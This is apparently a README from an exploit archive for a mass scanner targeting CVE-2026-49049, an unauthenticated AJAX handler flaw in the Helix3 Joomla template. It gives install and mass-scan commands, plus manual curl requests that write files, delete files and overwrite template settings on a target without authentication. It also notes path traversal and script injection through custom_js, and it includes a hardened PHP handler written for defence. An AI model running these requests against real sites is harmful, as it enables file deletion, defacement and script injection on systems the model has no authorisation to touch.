## https://sploitus.com/exploit?id=7AA8728A-DBBB-598B-8A88-CDFD3BBC34EE
# CVE-2026-49049 — Helix3 Joomla Plugin (JoomShaper)

Unauthenticated AJAX Handler — Read-Only Vulnerability Scanner

---

## Overview

**CVE-2026-49049** affects the Helix3 template framework for Joomla (versions **1.0 through 3.1.0**). The `onAjaxHelix3` handler, reachable via Joomla's `com_ajax` dispatcher, performs **no authentication, authorization, or CSRF validation** on several destructive actions:

| Action | Impact | Available In |
|---|---|---|
| `save` | Writes attacker-controlled JSON files with **path traversal** | All versions |
| `remove` | Deletes arbitrary files — **no extension or path restriction** | All versions |
| `import` | Overwrites stored template parameters in the database | **v3.x only** |

> **Note:** The `import` action was added in Helix3 v3.x. Sites running v2.x are only affected by `save` and `remove`.

The vulnerability was discovered by **Phil Taylor** (mySites.guru) and published June 29, 2026.

### Affected Versions

| Helix3 Version | save/remove | import |
|---|---|---|
| 1.0 – 2.x | Vulnerable | Not present |
| 3.0 – 3.1.0 | Vulnerable | Vulnerable |
| 3.1.1+ | Patched | Patched |

---

## Installation

```bash
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt
```

---

## Usage

```bash
# Single target
python cve_2026_49049.py -t 192.168.1.100

# Mass scan
python cve_2026_49049.py -f targets.txt -o results.txt

# With JSON report + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v
```

### Arguments

```
  -t, --target     Single target (domain or IP)
  -f, --file       File with targets, one per line
  -o, --output     Real-time text output (default: cve-2026-49049_scan.txt)
  --json           Structured JSON report (default: cve-2026-49049_report.json)
  --threads        Concurrent workers (default: 15)
  --timeout        HTTP timeout in seconds (default: 15)
  -v, --verbose    Show probe details
```

---

## Proof of Concept

### Detection & Validation

The scanner performs a **read-only probe**: it writes a harmless JSON file to the Helix3 layout folder via the unauthenticated `save` endpoint, verifies it was written, then immediately deletes it via the `remove` endpoint. No persistent changes are left on the target.

```bash
$ python cve_2026_49049.py -t 192.168.1.100 -v
```

```
    CVE-2026-49049 — Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   — accessible (probe: 3a9719da)
    [*] remove — accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s
```

### Manual Reproduction

The scanner probes these exact endpoints. For manual verification:

**Step 1 — Confirm Helix3 is installed**

```bash
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for the <version>X.X.X</version> element in the template manifest
```

**Step 2 — Test save action (unauthenticated file write)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'
```

**Step 3 — Test remove action (unauthenticated file delete)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'
```

**Step 4 — Test import action (v3.x only, not available in v2.x)**

```bash
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Note: import was added in Helix3 v3.x.
# Sites running v2.x will return an empty response for this action.
```

### Vulnerability Mechanism

In Helix3 versions before 3.1.1, `plugins/ajax/helix3/helix3.php` processes requests via `onAjaxHelix3()` with **no guards**:

```php
use Joomla\CMS\Factory;

public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // $layoutPath is the template's layout directory, set earlier in the plugin (not shown here).
    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}
```

### What Makes This Dangerous

- **Save + path traversal** — `layoutName=../../../somewhere/evil` writes files outside the intended layout directory
- **Remove has no extension restriction** — unlike `save` (which appends `.json`), `remove` can target any file type
- **Import (v3.x) overwrites database params** — `custom_js` is rendered **unescaped** in the template output, enabling script injection on every page. This is the vector used in real-world defacement attacks.
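For comparison, below is a hardened version of the `save`/`remove` handler that closes each of the gaps listed above. This is an added example written for this README; it is not JoomShaper's code and not the 3.1.1 patch. The class name, the `$layoutPath` constructor argument and the `core.manage`/`com_templates` permission choice are assumptions; the Joomla calls used (`Session::checkToken`, `getIdentity()`, `authorise()`) are standard CMS API.

```php
<?php
// Added example, not the Helix3 plugin's own code. Assumes the layout
// directory is passed in by the plugin; the real helper names may differ.
use Joomla\CMS\Factory;
use Joomla\CMS\Session\Session;

class PlgAjaxHelix3Hardened
{
    /** @var string Only directory this handler may touch (assumed, supplied by the plugin). */
    private $layoutPath;

    public function __construct(string $layoutPath)
    {
        // Resolve once so the containment check below compares canonical paths.
        $this->layoutPath = rtrim(realpath($layoutPath), '/') . '/';
    }

    public function onAjaxHelix3()
    {
        $app  = Factory::getApplication();
        $user = $app->getIdentity();

        // 1. CSRF: the POST must carry a valid Joomla session token.
        if (!Session::checkToken('post')) {
            throw new \RuntimeException('Invalid token', 403);
        }

        // 2. Authorisation: guests and users without template-management rights are rejected.
        if (!$user || $user->guest || !$user->authorise('core.manage', 'com_templates')) {
            throw new \RuntimeException('Not authorised', 403);
        }

        $data       = $app->input->post->get('data', [], 'array');
        $action     = (string) ($data['action'] ?? '');
        $layoutName = (string) ($data['layoutName'] ?? '');

        // 3. Allow-list the layout name: one path component of [A-Za-z0-9_-],
        //    so "../", "/" and NUL bytes can never reach the filesystem calls.
        if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $layoutName)) {
            throw new \InvalidArgumentException('Invalid layout name', 400);
        }

        // Both actions are restricted to a .json file inside the layout directory,
        // which removes the "remove can delete any file type" gap.
        $filepath = $this->layoutPath . $layoutName . '.json';

        switch ($action) {
            case 'remove':
                // 4. Containment: the canonical path must still start with the layout directory.
                $real = realpath($filepath);
                if ($real === false || strpos($real, $this->layoutPath) !== 0) {
                    throw new \RuntimeException('Not found', 404);
                }
                unlink($real);
                break;

            case 'save':
                // 5. Content validation: store only syntactically valid JSON.
                $content = (string) ($data['content'] ?? '');
                json_decode($content);
                if (json_last_error() !== JSON_ERROR_NONE) {
                    throw new \InvalidArgumentException('Content must be valid JSON', 400);
                }
                file_put_contents($filepath, $content, LOCK_EX);
                break;

            default:
                throw new \InvalidArgumentException('Unknown action', 400);
        }

        // com_ajax JSON-encodes the return value for the caller.
        return ['status' => 'ok'];
    }
}
```

The order of the checks matters: token and permission checks run before any input is read, so an unauthenticated request never reaches the filename logic, and the regex plus `realpath` containment means a bug in one layer is still caught by the other.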

---

## Disclaimer

> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse. By using this software, you accept full responsibility for your actions.

---

## References

| Resource | Link |
|---|---|
| Original Advisory (mySites.guru) | [Helix3 3.1.1 Security Fix](https://mysites.guru/blog/helix3-security-update-changelog-failure/) |
| NVD Entry | [CVE-2026-49049](https://nvd.nist.gov/vuln/detail/CVE-2026-49049) |
| OpenCVE | [CVE-2026-49049](https://app.opencve.io/cve/CVE-2026-49049) |
| JoomShaper GitHub | [Helix3 Repository](https://github.com/JoomShaper/Helix3) |

---

This project is not affiliated with JoomShaper, Joomla, or Open Source Matters, Inc.